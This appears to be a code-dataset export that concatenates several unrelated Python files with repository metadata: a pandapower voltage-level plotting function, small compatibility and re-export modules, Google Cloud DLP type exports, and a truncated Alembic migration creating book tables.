from pandapower.plotting.plotly.traces import create_bus_trace, create_line_trace, create_trafo_trace, draw_traces, \
version_check
from pandapower.plotting.plotly.get_colors import get_plotly_color_palette
from pandapower.plotting.plotly.mapbox_plot import *
from pandapower.topology import create_nxgraph, connected_components
try:
import pplog as logging
except ImportError:
import logging
logger = logging.getLogger(__name__)
def vlevel_plotly(net, respect_switches=True, use_line_geodata=None, colors_dict=None, on_map=False,
projection=None, map_style='basic', figsize=1, aspectratio='auto', line_width=2,
bus_size=10):
"""
Plots a pandapower network in plotly
using lines/buses colors according to the voltage level they belong to.
If no geodata is available, artificial geodata is generated. For advanced plotting see the tutorial
INPUT:
**net** - The pandapower format network. If none is provided, mv_oberrhein() will be
plotted as an example
OPTIONAL:
**respect_switches** (bool, True) - Respect switches when artificial geodata is created
**use_line_geodata** (bool, True) - defines if lines patches are based on net.line_geodata of the lines (True)
or on net.bus_geodata of the connected buses (False)
*colors_dict** (dict, None) - dictionary for customization of colors for each voltage level in the form:
voltage_kv : color
**on_map** (bool, False) - enables using mapbox plot in plotly If provided geodata are not real
geo-coordinates in lon/lat form, on_map will be set to False.
**projection** (String, None) - defines a projection from which network geo-data will be transformed to
lat-long. For each projection a string can be found at http://spatialreference.org/ref/epsg/
**map_style** (str, 'basic') - enables using mapbox plot in plotly
- 'streets'
- 'bright'
- 'light'
- 'dark'
- 'satellite'
**figsize** (float, 1) - aspectratio is multiplied by it in order to get final image size
**aspectratio** (tuple, 'auto') - when 'auto' it preserves original aspect ratio of the network geodata
any custom aspectration can be given as a tuple, e.g. (1.2, 1)
**line_width** (float, 1.0) - width of lines
**bus_size** (float, 10.0) - size of buses to plot.
"""
version_check()
# create geocoord if none are available
if 'line_geodata' not in net:
net.line_geodata = pd.DataFrame(columns=['coords'])
if 'bus_geodata' not in net:
net.bus_geodata = pd.DataFrame(columns=["x", "y"])
if len(net.line_geodata) == 0 and len(net.bus_geodata) == 0:
logger.warning("No or insufficient geodata available --> Creating artificial coordinates." +
" This may take some time")
create_generic_coordinates(net, respect_switches=respect_switches)
if on_map:
logger.warning("Map plots not available with artificial coordinates and will be disabled!")
on_map = False
# check if geodata are real geographycal lat/lon coordinates using geopy
if on_map and projection is not None:
geo_data_to_latlong(net, projection=projection)
# if bus geodata is available, but no line geodata
if use_line_geodata is None:
use_line_geodata = False if len(net.line_geodata) == 0 else True
elif use_line_geodata and len(net.line_geodata) == 0:
logger.warning("No or insufficient line geodata available --> only bus geodata will be used.")
use_line_geodata = False
# getting connected componenets without consideration of trafos
graph = create_nxgraph(net, include_trafos=False)
vlev_buses = connected_components(graph)
# getting unique sets of buses for each voltage level
vlev_bus_dict = {}
for vl_buses in vlev_buses:
if net.bus.loc[vl_buses, 'vn_kv'].unique().shape[0] > 1:
logger.warning('buses from the same voltage level does not have the same vn_kv !?')
vn_kv = net.bus.loc[vl_buses, 'vn_kv'].unique()[0]
if vlev_bus_dict.get(vn_kv):
vlev_bus_dict[vn_kv].update(vl_buses)
else:
vlev_bus_dict[vn_kv] = vl_buses
# create a default colormap for voltage levels
nvlevs = len(vlev_bus_dict)
colors = get_plotly_color_palette(nvlevs)
colors_dict = dict(zip(vlev_bus_dict.keys(), colors))
# creating traces for buses and lines for each voltage level
bus_traces = []
line_traces = []
for vn_kv, buses_vl in vlev_bus_dict.items():
vlev_color = colors_dict[vn_kv]
bus_trace_vlev = create_bus_trace(net, buses=buses_vl, size=bus_size, legendgroup=str(vn_kv),
color=vlev_color, trace_name='buses {0} kV'.format(vn_kv))
if bus_trace_vlev is not None:
bus_traces += bus_trace_vlev
vlev_lines = net.line[net.line.from_bus.isin(buses_vl) & net.line.to_bus.isin(buses_vl)].index.tolist()
line_trace_vlev = create_line_trace(net, lines=vlev_lines, use_line_geodata=use_line_geodata,
respect_switches=respect_switches, legendgroup=str(vn_kv),
color=vlev_color, width=line_width, trace_name='lines {0} kV'.format(vn_kv))
if line_trace_vlev is not None:
line_traces += line_trace_vlev
trafo_traces = create_trafo_trace(net, color='gray', width=line_width * 2)
draw_traces(line_traces + trafo_traces + bus_traces, showlegend=True,
aspectratio=aspectratio, on_map=on_map, map_style=map_style, figsize=figsize)
| 45.223881 | 120 | 0.679703 | # -*- coding: utf-8 -*-
# Copyright (c) 2016-2018 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
import pandas as pd
from pandapower.plotting.generic_geodata import create_generic_coordinates
from pandapower.plotting.plotly.traces import create_bus_trace, create_line_trace, create_trafo_trace, draw_traces, \
version_check
from pandapower.plotting.plotly.get_colors import get_plotly_color_palette
from pandapower.plotting.plotly.mapbox_plot import *
from pandapower.topology import create_nxgraph, connected_components
try:
import pplog as logging
except ImportError:
import logging
logger = logging.getLogger(__name__)
def vlevel_plotly(net, respect_switches=True, use_line_geodata=None, colors_dict=None, on_map=False,
projection=None, map_style='basic', figsize=1, aspectratio='auto', line_width=2,
bus_size=10):
"""
Plots a pandapower network in plotly
using lines/buses colors according to the voltage level they belong to.
If no geodata is available, artificial geodata is generated. For advanced plotting see the tutorial
INPUT:
**net** - The pandapower format network. If none is provided, mv_oberrhein() will be
plotted as an example
OPTIONAL:
**respect_switches** (bool, True) - Respect switches when artificial geodata is created
**use_line_geodata** (bool, True) - defines if lines patches are based on net.line_geodata of the lines (True)
or on net.bus_geodata of the connected buses (False)
*colors_dict** (dict, None) - dictionary for customization of colors for each voltage level in the form:
voltage_kv : color
**on_map** (bool, False) - enables using mapbox plot in plotly If provided geodata are not real
geo-coordinates in lon/lat form, on_map will be set to False.
**projection** (String, None) - defines a projection from which network geo-data will be transformed to
lat-long. For each projection a string can be found at http://spatialreference.org/ref/epsg/
**map_style** (str, 'basic') - enables using mapbox plot in plotly
- 'streets'
- 'bright'
- 'light'
- 'dark'
- 'satellite'
**figsize** (float, 1) - aspectratio is multiplied by it in order to get final image size
**aspectratio** (tuple, 'auto') - when 'auto' it preserves original aspect ratio of the network geodata
any custom aspectration can be given as a tuple, e.g. (1.2, 1)
**line_width** (float, 1.0) - width of lines
**bus_size** (float, 10.0) - size of buses to plot.
"""
version_check()
# create geocoord if none are available
if 'line_geodata' not in net:
net.line_geodata = pd.DataFrame(columns=['coords'])
if 'bus_geodata' not in net:
net.bus_geodata = pd.DataFrame(columns=["x", "y"])
if len(net.line_geodata) == 0 and len(net.bus_geodata) == 0:
logger.warning("No or insufficient geodata available --> Creating artificial coordinates." +
" This may take some time")
create_generic_coordinates(net, respect_switches=respect_switches)
if on_map:
logger.warning("Map plots not available with artificial coordinates and will be disabled!")
on_map = False
# check if geodata are real geographycal lat/lon coordinates using geopy
if on_map and projection is not None:
geo_data_to_latlong(net, projection=projection)
# if bus geodata is available, but no line geodata
if use_line_geodata is None:
use_line_geodata = False if len(net.line_geodata) == 0 else True
elif use_line_geodata and len(net.line_geodata) == 0:
logger.warning("No or insufficient line geodata available --> only bus geodata will be used.")
use_line_geodata = False
# getting connected componenets without consideration of trafos
graph = create_nxgraph(net, include_trafos=False)
vlev_buses = connected_components(graph)
# getting unique sets of buses for each voltage level
vlev_bus_dict = {}
for vl_buses in vlev_buses:
if net.bus.loc[vl_buses, 'vn_kv'].unique().shape[0] > 1:
logger.warning('buses from the same voltage level does not have the same vn_kv !?')
vn_kv = net.bus.loc[vl_buses, 'vn_kv'].unique()[0]
if vlev_bus_dict.get(vn_kv):
vlev_bus_dict[vn_kv].update(vl_buses)
else:
vlev_bus_dict[vn_kv] = vl_buses
# create a default colormap for voltage levels
nvlevs = len(vlev_bus_dict)
colors = get_plotly_color_palette(nvlevs)
colors_dict = dict(zip(vlev_bus_dict.keys(), colors))
# creating traces for buses and lines for each voltage level
bus_traces = []
line_traces = []
for vn_kv, buses_vl in vlev_bus_dict.items():
vlev_color = colors_dict[vn_kv]
bus_trace_vlev = create_bus_trace(net, buses=buses_vl, size=bus_size, legendgroup=str(vn_kv),
color=vlev_color, trace_name='buses {0} kV'.format(vn_kv))
if bus_trace_vlev is not None:
bus_traces += bus_trace_vlev
vlev_lines = net.line[net.line.from_bus.isin(buses_vl) & net.line.to_bus.isin(buses_vl)].index.tolist()
line_trace_vlev = create_line_trace(net, lines=vlev_lines, use_line_geodata=use_line_geodata,
respect_switches=respect_switches, legendgroup=str(vn_kv),
color=vlev_color, width=line_width, trace_name='lines {0} kV'.format(vn_kv))
if line_trace_vlev is not None:
line_traces += line_trace_vlev
trafo_traces = create_trafo_trace(net, color='gray', width=line_width * 2)
draw_traces(line_traces + trafo_traces + bus_traces, showlegend=True,
aspectratio=aspectratio, on_map=on_map, map_style=map_style, figsize=figsize)
| 0 | 0 | 0 |
f0b61d465c43a5af5d164b54e0cfaea6d2ccdac4 | 139 | py | Python | client/bert_serving/client/_py3_var.py | devanshuDesai/bert-as-service | a1d3a225387bfdea15c7721d8493e6005b1c4a1b | [
"MIT"
] | 10,342 | 2018-11-12T11:11:50.000Z | 2022-03-23T15:29:27.000Z | client/bert_serving/client/_py3_var.py | worksking/bert-as-service | c57a646796c0c967ffd6d97249bce20c384272e3 | [
"MIT"
] | 553 | 2018-11-12T13:41:34.000Z | 2022-03-21T06:52:07.000Z | client/bert_serving/client/_py3_var.py | worksking/bert-as-service | c57a646796c0c967ffd6d97249bce20c384272e3 | [
"MIT"
] | 2,005 | 2018-11-12T12:52:04.000Z | 2022-03-21T10:02:14.000Z | __all__ = ['_py2', '_str', '_buffer', '_raise']
_py2 = False
_str = str
_buffer = memoryview
| 13.9 | 47 | 0.640288 | __all__ = ['_py2', '_str', '_buffer', '_raise']
_py2 = False
_str = str
_buffer = memoryview
def _raise(t_e, _e):
raise t_e from _e
| 21 | 0 | 23 |
9c1291a2693183eb2286818639ecea6b6ba312dc | 157 | py | Python | covfefe/frameworks/torch/math.py | deepnn/pybrew | 1417c910f6663e1c5f3c5eafdf1a34b68dce88a1 | [
"MIT"
] | 4 | 2017-06-08T08:59:48.000Z | 2020-02-13T18:17:00.000Z | covfefe/frameworks/torch/math.py | deepnn/coffee | 1417c910f6663e1c5f3c5eafdf1a34b68dce88a1 | [
"MIT"
] | null | null | null | covfefe/frameworks/torch/math.py | deepnn/coffee | 1417c910f6663e1c5f3c5eafdf1a34b68dce88a1 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import print_function
# This will make all the math functions of torch available
from torch import *
| 26.166667 | 58 | 0.834395 | from __future__ import absolute_import
from __future__ import print_function
# This will make all the math functions of torch available
from torch import *
| 0 | 0 | 0 |
5b5e2f28135770e6b8706e5756cc7952341c4122 | 8,331 | py | Python | google/cloud/dlp_v2/types/__init__.py | LaudateCorpus1/python-dlp | e0a51c9254677016f547647848dcbee85ee1bf29 | [
"Apache-2.0"
] | 32 | 2020-07-11T02:50:13.000Z | 2022-02-10T19:45:59.000Z | google/cloud/dlp_v2/types/__init__.py | LaudateCorpus1/python-dlp | e0a51c9254677016f547647848dcbee85ee1bf29 | [
"Apache-2.0"
] | 112 | 2020-02-11T13:24:14.000Z | 2022-03-31T20:59:08.000Z | google/cloud/dlp_v2/types/__init__.py | LaudateCorpus1/python-dlp | e0a51c9254677016f547647848dcbee85ee1bf29 | [
"Apache-2.0"
] | 22 | 2020-02-03T18:23:38.000Z | 2022-01-29T08:09:29.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .dlp import (
Action,
ActivateJobTriggerRequest,
AnalyzeDataSourceRiskDetails,
BoundingBox,
BucketingConfig,
ByteContentItem,
CancelDlpJobRequest,
CharacterMaskConfig,
CharsToIgnore,
Color,
Container,
ContentItem,
ContentLocation,
CreateDeidentifyTemplateRequest,
CreateDlpJobRequest,
CreateInspectTemplateRequest,
CreateJobTriggerRequest,
CreateStoredInfoTypeRequest,
CryptoDeterministicConfig,
CryptoHashConfig,
CryptoKey,
CryptoReplaceFfxFpeConfig,
DateShiftConfig,
DateTime,
DeidentifyConfig,
DeidentifyContentRequest,
DeidentifyContentResponse,
DeidentifyTemplate,
DeleteDeidentifyTemplateRequest,
DeleteDlpJobRequest,
DeleteInspectTemplateRequest,
DeleteJobTriggerRequest,
DeleteStoredInfoTypeRequest,
DlpJob,
DocumentLocation,
Error,
ExcludeInfoTypes,
ExclusionRule,
FieldTransformation,
Finding,
FinishDlpJobRequest,
FixedSizeBucketingConfig,
GetDeidentifyTemplateRequest,
GetDlpJobRequest,
GetInspectTemplateRequest,
GetJobTriggerRequest,
GetStoredInfoTypeRequest,
HybridContentItem,
HybridFindingDetails,
HybridInspectDlpJobRequest,
HybridInspectJobTriggerRequest,
HybridInspectResponse,
HybridInspectStatistics,
ImageLocation,
InfoTypeDescription,
InfoTypeStats,
InfoTypeTransformations,
InspectConfig,
InspectContentRequest,
InspectContentResponse,
InspectDataSourceDetails,
InspectionRule,
InspectionRuleSet,
InspectJobConfig,
InspectResult,
InspectTemplate,
JobTrigger,
KmsWrappedCryptoKey,
LargeCustomDictionaryConfig,
LargeCustomDictionaryStats,
ListDeidentifyTemplatesRequest,
ListDeidentifyTemplatesResponse,
ListDlpJobsRequest,
ListDlpJobsResponse,
ListInfoTypesRequest,
ListInfoTypesResponse,
ListInspectTemplatesRequest,
ListInspectTemplatesResponse,
ListJobTriggersRequest,
ListJobTriggersResponse,
ListStoredInfoTypesRequest,
ListStoredInfoTypesResponse,
Location,
Manual,
MetadataLocation,
OutputStorageConfig,
PrimitiveTransformation,
PrivacyMetric,
QuasiId,
QuoteInfo,
Range,
RecordCondition,
RecordLocation,
RecordSuppression,
RecordTransformations,
RedactConfig,
RedactImageRequest,
RedactImageResponse,
ReidentifyContentRequest,
ReidentifyContentResponse,
ReplaceDictionaryConfig,
ReplaceValueConfig,
ReplaceWithInfoTypeConfig,
RiskAnalysisJobConfig,
Schedule,
StatisticalTable,
StorageMetadataLabel,
StoredInfoType,
StoredInfoTypeConfig,
StoredInfoTypeStats,
StoredInfoTypeVersion,
Table,
TableLocation,
TimePartConfig,
TransformationErrorHandling,
TransformationOverview,
TransformationSummary,
TransientCryptoKey,
UnwrappedCryptoKey,
UpdateDeidentifyTemplateRequest,
UpdateInspectTemplateRequest,
UpdateJobTriggerRequest,
UpdateStoredInfoTypeRequest,
Value,
ValueFrequency,
ContentOption,
DlpJobType,
InfoTypeSupportedBy,
MatchingType,
MetadataType,
RelationalOperator,
StoredInfoTypeState,
)
from .storage import (
BigQueryField,
BigQueryKey,
BigQueryOptions,
BigQueryTable,
CloudStorageFileSet,
CloudStorageOptions,
CloudStoragePath,
CloudStorageRegexFileSet,
CustomInfoType,
DatastoreKey,
DatastoreOptions,
EntityId,
FieldId,
HybridOptions,
InfoType,
Key,
KindExpression,
PartitionId,
RecordKey,
StorageConfig,
StoredType,
TableOptions,
FileType,
Likelihood,
)
__all__ = (
"Action",
"ActivateJobTriggerRequest",
"AnalyzeDataSourceRiskDetails",
"BoundingBox",
"BucketingConfig",
"ByteContentItem",
"CancelDlpJobRequest",
"CharacterMaskConfig",
"CharsToIgnore",
"Color",
"Container",
"ContentItem",
"ContentLocation",
"CreateDeidentifyTemplateRequest",
"CreateDlpJobRequest",
"CreateInspectTemplateRequest",
"CreateJobTriggerRequest",
"CreateStoredInfoTypeRequest",
"CryptoDeterministicConfig",
"CryptoHashConfig",
"CryptoKey",
"CryptoReplaceFfxFpeConfig",
"DateShiftConfig",
"DateTime",
"DeidentifyConfig",
"DeidentifyContentRequest",
"DeidentifyContentResponse",
"DeidentifyTemplate",
"DeleteDeidentifyTemplateRequest",
"DeleteDlpJobRequest",
"DeleteInspectTemplateRequest",
"DeleteJobTriggerRequest",
"DeleteStoredInfoTypeRequest",
"DlpJob",
"DocumentLocation",
"Error",
"ExcludeInfoTypes",
"ExclusionRule",
"FieldTransformation",
"Finding",
"FinishDlpJobRequest",
"FixedSizeBucketingConfig",
"GetDeidentifyTemplateRequest",
"GetDlpJobRequest",
"GetInspectTemplateRequest",
"GetJobTriggerRequest",
"GetStoredInfoTypeRequest",
"HybridContentItem",
"HybridFindingDetails",
"HybridInspectDlpJobRequest",
"HybridInspectJobTriggerRequest",
"HybridInspectResponse",
"HybridInspectStatistics",
"ImageLocation",
"InfoTypeDescription",
"InfoTypeStats",
"InfoTypeTransformations",
"InspectConfig",
"InspectContentRequest",
"InspectContentResponse",
"InspectDataSourceDetails",
"InspectionRule",
"InspectionRuleSet",
"InspectJobConfig",
"InspectResult",
"InspectTemplate",
"JobTrigger",
"KmsWrappedCryptoKey",
"LargeCustomDictionaryConfig",
"LargeCustomDictionaryStats",
"ListDeidentifyTemplatesRequest",
"ListDeidentifyTemplatesResponse",
"ListDlpJobsRequest",
"ListDlpJobsResponse",
"ListInfoTypesRequest",
"ListInfoTypesResponse",
"ListInspectTemplatesRequest",
"ListInspectTemplatesResponse",
"ListJobTriggersRequest",
"ListJobTriggersResponse",
"ListStoredInfoTypesRequest",
"ListStoredInfoTypesResponse",
"Location",
"Manual",
"MetadataLocation",
"OutputStorageConfig",
"PrimitiveTransformation",
"PrivacyMetric",
"QuasiId",
"QuoteInfo",
"Range",
"RecordCondition",
"RecordLocation",
"RecordSuppression",
"RecordTransformations",
"RedactConfig",
"RedactImageRequest",
"RedactImageResponse",
"ReidentifyContentRequest",
"ReidentifyContentResponse",
"ReplaceDictionaryConfig",
"ReplaceValueConfig",
"ReplaceWithInfoTypeConfig",
"RiskAnalysisJobConfig",
"Schedule",
"StatisticalTable",
"StorageMetadataLabel",
"StoredInfoType",
"StoredInfoTypeConfig",
"StoredInfoTypeStats",
"StoredInfoTypeVersion",
"Table",
"TableLocation",
"TimePartConfig",
"TransformationErrorHandling",
"TransformationOverview",
"TransformationSummary",
"TransientCryptoKey",
"UnwrappedCryptoKey",
"UpdateDeidentifyTemplateRequest",
"UpdateInspectTemplateRequest",
"UpdateJobTriggerRequest",
"UpdateStoredInfoTypeRequest",
"Value",
"ValueFrequency",
"ContentOption",
"DlpJobType",
"InfoTypeSupportedBy",
"MatchingType",
"MetadataType",
"RelationalOperator",
"StoredInfoTypeState",
"BigQueryField",
"BigQueryKey",
"BigQueryOptions",
"BigQueryTable",
"CloudStorageFileSet",
"CloudStorageOptions",
"CloudStoragePath",
"CloudStorageRegexFileSet",
"CustomInfoType",
"DatastoreKey",
"DatastoreOptions",
"EntityId",
"FieldId",
"HybridOptions",
"InfoType",
"Key",
"KindExpression",
"PartitionId",
"RecordKey",
"StorageConfig",
"StoredType",
"TableOptions",
"FileType",
"Likelihood",
)
| 24.868657 | 74 | 0.716721 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .dlp import (
Action,
ActivateJobTriggerRequest,
AnalyzeDataSourceRiskDetails,
BoundingBox,
BucketingConfig,
ByteContentItem,
CancelDlpJobRequest,
CharacterMaskConfig,
CharsToIgnore,
Color,
Container,
ContentItem,
ContentLocation,
CreateDeidentifyTemplateRequest,
CreateDlpJobRequest,
CreateInspectTemplateRequest,
CreateJobTriggerRequest,
CreateStoredInfoTypeRequest,
CryptoDeterministicConfig,
CryptoHashConfig,
CryptoKey,
CryptoReplaceFfxFpeConfig,
DateShiftConfig,
DateTime,
DeidentifyConfig,
DeidentifyContentRequest,
DeidentifyContentResponse,
DeidentifyTemplate,
DeleteDeidentifyTemplateRequest,
DeleteDlpJobRequest,
DeleteInspectTemplateRequest,
DeleteJobTriggerRequest,
DeleteStoredInfoTypeRequest,
DlpJob,
DocumentLocation,
Error,
ExcludeInfoTypes,
ExclusionRule,
FieldTransformation,
Finding,
FinishDlpJobRequest,
FixedSizeBucketingConfig,
GetDeidentifyTemplateRequest,
GetDlpJobRequest,
GetInspectTemplateRequest,
GetJobTriggerRequest,
GetStoredInfoTypeRequest,
HybridContentItem,
HybridFindingDetails,
HybridInspectDlpJobRequest,
HybridInspectJobTriggerRequest,
HybridInspectResponse,
HybridInspectStatistics,
ImageLocation,
InfoTypeDescription,
InfoTypeStats,
InfoTypeTransformations,
InspectConfig,
InspectContentRequest,
InspectContentResponse,
InspectDataSourceDetails,
InspectionRule,
InspectionRuleSet,
InspectJobConfig,
InspectResult,
InspectTemplate,
JobTrigger,
KmsWrappedCryptoKey,
LargeCustomDictionaryConfig,
LargeCustomDictionaryStats,
ListDeidentifyTemplatesRequest,
ListDeidentifyTemplatesResponse,
ListDlpJobsRequest,
ListDlpJobsResponse,
ListInfoTypesRequest,
ListInfoTypesResponse,
ListInspectTemplatesRequest,
ListInspectTemplatesResponse,
ListJobTriggersRequest,
ListJobTriggersResponse,
ListStoredInfoTypesRequest,
ListStoredInfoTypesResponse,
Location,
Manual,
MetadataLocation,
OutputStorageConfig,
PrimitiveTransformation,
PrivacyMetric,
QuasiId,
QuoteInfo,
Range,
RecordCondition,
RecordLocation,
RecordSuppression,
RecordTransformations,
RedactConfig,
RedactImageRequest,
RedactImageResponse,
ReidentifyContentRequest,
ReidentifyContentResponse,
ReplaceDictionaryConfig,
ReplaceValueConfig,
ReplaceWithInfoTypeConfig,
RiskAnalysisJobConfig,
Schedule,
StatisticalTable,
StorageMetadataLabel,
StoredInfoType,
StoredInfoTypeConfig,
StoredInfoTypeStats,
StoredInfoTypeVersion,
Table,
TableLocation,
TimePartConfig,
TransformationErrorHandling,
TransformationOverview,
TransformationSummary,
TransientCryptoKey,
UnwrappedCryptoKey,
UpdateDeidentifyTemplateRequest,
UpdateInspectTemplateRequest,
UpdateJobTriggerRequest,
UpdateStoredInfoTypeRequest,
Value,
ValueFrequency,
ContentOption,
DlpJobType,
InfoTypeSupportedBy,
MatchingType,
MetadataType,
RelationalOperator,
StoredInfoTypeState,
)
from .storage import (
BigQueryField,
BigQueryKey,
BigQueryOptions,
BigQueryTable,
CloudStorageFileSet,
CloudStorageOptions,
CloudStoragePath,
CloudStorageRegexFileSet,
CustomInfoType,
DatastoreKey,
DatastoreOptions,
EntityId,
FieldId,
HybridOptions,
InfoType,
Key,
KindExpression,
PartitionId,
RecordKey,
StorageConfig,
StoredType,
TableOptions,
FileType,
Likelihood,
)
__all__ = (
"Action",
"ActivateJobTriggerRequest",
"AnalyzeDataSourceRiskDetails",
"BoundingBox",
"BucketingConfig",
"ByteContentItem",
"CancelDlpJobRequest",
"CharacterMaskConfig",
"CharsToIgnore",
"Color",
"Container",
"ContentItem",
"ContentLocation",
"CreateDeidentifyTemplateRequest",
"CreateDlpJobRequest",
"CreateInspectTemplateRequest",
"CreateJobTriggerRequest",
"CreateStoredInfoTypeRequest",
"CryptoDeterministicConfig",
"CryptoHashConfig",
"CryptoKey",
"CryptoReplaceFfxFpeConfig",
"DateShiftConfig",
"DateTime",
"DeidentifyConfig",
"DeidentifyContentRequest",
"DeidentifyContentResponse",
"DeidentifyTemplate",
"DeleteDeidentifyTemplateRequest",
"DeleteDlpJobRequest",
"DeleteInspectTemplateRequest",
"DeleteJobTriggerRequest",
"DeleteStoredInfoTypeRequest",
"DlpJob",
"DocumentLocation",
"Error",
"ExcludeInfoTypes",
"ExclusionRule",
"FieldTransformation",
"Finding",
"FinishDlpJobRequest",
"FixedSizeBucketingConfig",
"GetDeidentifyTemplateRequest",
"GetDlpJobRequest",
"GetInspectTemplateRequest",
"GetJobTriggerRequest",
"GetStoredInfoTypeRequest",
"HybridContentItem",
"HybridFindingDetails",
"HybridInspectDlpJobRequest",
"HybridInspectJobTriggerRequest",
"HybridInspectResponse",
"HybridInspectStatistics",
"ImageLocation",
"InfoTypeDescription",
"InfoTypeStats",
"InfoTypeTransformations",
"InspectConfig",
"InspectContentRequest",
"InspectContentResponse",
"InspectDataSourceDetails",
"InspectionRule",
"InspectionRuleSet",
"InspectJobConfig",
"InspectResult",
"InspectTemplate",
"JobTrigger",
"KmsWrappedCryptoKey",
"LargeCustomDictionaryConfig",
"LargeCustomDictionaryStats",
"ListDeidentifyTemplatesRequest",
"ListDeidentifyTemplatesResponse",
"ListDlpJobsRequest",
"ListDlpJobsResponse",
"ListInfoTypesRequest",
"ListInfoTypesResponse",
"ListInspectTemplatesRequest",
"ListInspectTemplatesResponse",
"ListJobTriggersRequest",
"ListJobTriggersResponse",
"ListStoredInfoTypesRequest",
"ListStoredInfoTypesResponse",
"Location",
"Manual",
"MetadataLocation",
"OutputStorageConfig",
"PrimitiveTransformation",
"PrivacyMetric",
"QuasiId",
"QuoteInfo",
"Range",
"RecordCondition",
"RecordLocation",
"RecordSuppression",
"RecordTransformations",
"RedactConfig",
"RedactImageRequest",
"RedactImageResponse",
"ReidentifyContentRequest",
"ReidentifyContentResponse",
"ReplaceDictionaryConfig",
"ReplaceValueConfig",
"ReplaceWithInfoTypeConfig",
"RiskAnalysisJobConfig",
"Schedule",
"StatisticalTable",
"StorageMetadataLabel",
"StoredInfoType",
"StoredInfoTypeConfig",
"StoredInfoTypeStats",
"StoredInfoTypeVersion",
"Table",
"TableLocation",
"TimePartConfig",
"TransformationErrorHandling",
"TransformationOverview",
"TransformationSummary",
"TransientCryptoKey",
"UnwrappedCryptoKey",
"UpdateDeidentifyTemplateRequest",
"UpdateInspectTemplateRequest",
"UpdateJobTriggerRequest",
"UpdateStoredInfoTypeRequest",
"Value",
"ValueFrequency",
"ContentOption",
"DlpJobType",
"InfoTypeSupportedBy",
"MatchingType",
"MetadataType",
"RelationalOperator",
"StoredInfoTypeState",
"BigQueryField",
"BigQueryKey",
"BigQueryOptions",
"BigQueryTable",
"CloudStorageFileSet",
"CloudStorageOptions",
"CloudStoragePath",
"CloudStorageRegexFileSet",
"CustomInfoType",
"DatastoreKey",
"DatastoreOptions",
"EntityId",
"FieldId",
"HybridOptions",
"InfoType",
"Key",
"KindExpression",
"PartitionId",
"RecordKey",
"StorageConfig",
"StoredType",
"TableOptions",
"FileType",
"Likelihood",
)
| 0 | 0 | 0 |
7b4a4abfc360c91e636d21c2caa530fd56ec84b4 | 22 | py | Python | example/__init__.py | ORIGINALLIFE/ndkale | 759a7132afdfcabd2de658a7701673a928992827 | [
"BSD-2-Clause"
] | 210 | 2015-03-28T01:00:08.000Z | 2022-03-20T15:59:57.000Z | example/__init__.py | ORIGINALLIFE/ndkale | 759a7132afdfcabd2de658a7701673a928992827 | [
"BSD-2-Clause"
] | 32 | 2015-07-30T22:31:59.000Z | 2020-05-15T22:22:07.000Z | example/__init__.py | ORIGINALLIFE/ndkale | 759a7132afdfcabd2de658a7701673a928992827 | [
"BSD-2-Clause"
] | 51 | 2015-03-26T21:37:46.000Z | 2022-01-18T05:36:28.000Z | __author__ = 'wenbin'
| 11 | 21 | 0.727273 | __author__ = 'wenbin'
| 0 | 0 | 0 |
3e1124e492698672a5a250af850c0ab097fc9e18 | 2,835 | py | Python | migrations/versions/e96fe0cc3a92_.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | 4 | 2017-06-30T01:32:52.000Z | 2019-07-03T15:46:24.000Z | migrations/versions/e96fe0cc3a92_.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | 3 | 2021-03-22T17:13:51.000Z | 2021-12-13T19:40:20.000Z | migrations/versions/e96fe0cc3a92_.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | null | null | null | """empty message
Revision ID: e96fe0cc3a92
Revises: f1ffa6279209
Create Date: 2017-07-19 09:03:31.402092
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'e96fe0cc3a92'
down_revision = 'f1ffa6279209'
branch_labels = None
depends_on = None
| 38.310811 | 91 | 0.672663 | """empty message
Revision ID: e96fe0cc3a92
Revises: f1ffa6279209
Create Date: 2017-07-19 09:03:31.402092
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'e96fe0cc3a92'
down_revision = 'f1ffa6279209'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('books',
sa.Column('book_id', sa.Integer(), nullable=False),
sa.Column('book_author', sa.Text(), nullable=True),
sa.Column('book_cover', sa.Text(), nullable=True),
sa.Column('book_rate', sa.Integer(), nullable=True),
sa.Column('book_content', sa.Text(), nullable=True),
sa.Column('book_publish', sa.Text(), nullable=True),
sa.Column('book_last_number', sa.Integer(), nullable=True),
sa.Column('book_key', sa.String(length=13), nullable=True),
sa.Column('book_db_id', sa.Integer(), nullable=True),
sa.Column('book_title', sa.Text(), nullable=True),
sa.Column('book_place', sa.Text(), nullable=True),
sa.Column('detail_data', sa.Text(), nullable=True),
sa.Column('hot_id', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('book_id'),
sa.UniqueConstraint('book_db_id')
)
op.create_index(op.f('ix_books_book_key'), 'books', ['book_key'], unique=False)
op.create_table('book_lists',
sa.Column('id_', sa.Integer(), nullable=False),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('title', sa.Text(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['users.id_'], ),
